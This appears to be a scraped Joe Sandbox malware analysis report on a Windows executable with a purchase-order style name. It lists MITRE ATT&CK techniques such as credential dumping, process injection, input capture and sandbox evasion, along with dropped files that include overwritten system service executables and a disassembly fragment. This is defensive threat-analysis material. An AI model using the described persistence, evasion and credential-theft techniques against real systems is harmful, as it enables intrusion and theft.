OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0040100A), ref: 0043B303

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0043B2FE

Memory Dump Source

Source File: 00000000.00000002.1540140199.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1540091020.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540218892.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540316509.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540378931.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540449262.0000000000529000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1540488889.0000000000530000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_RFQ _ Virtue 054451000085.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3158253471-631824599
Opcode ID: 1d2e9604d48c8e7db41109c9ed8690ec6c36f65431277a35350cc55d3018cbc9
Instruction ID: 2b780658d3da49ad9f9e4503d56df9c93059da648c8d5ac8478d33f484e7c10e
Opcode Fuzzy Hash: 1d2e9604d48c8e7db41109c9ed8690ec6c36f65431277a35350cc55d3018cbc9
Instruction Fuzzy Hash: 02E06DB02007208BD720AF29E5047467AE4EF14308F00897EE856C7341EBB8E488CBA9

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Driver: Driver Load, File: File Creation, File: File Modification, Module: Module Load
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report RFQ _ Virtue 054451000085.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe

C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log

C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exe

C:\Users\user\AppData\Local\Temp\G109m407

C:\Users\user\AppData\Local\Temp\aut8E66.tmp

C:\Users\user\AppData\Local\Temp\immortaliser

C:\Users\user\AppData\Roaming\902dfe32f8c88b11.bin

C:\Windows\System32\AppVClient.exe

C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe

C:\Windows\System32\FXSSVC.exe

C:\Windows\System32\alg.exe

C:\Windows\System32\config\systemprofile\AppData\Roaming\902dfe32f8c88b11.bin

Windows Analysis Report
RFQ _ Virtue 054451000085.exe

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre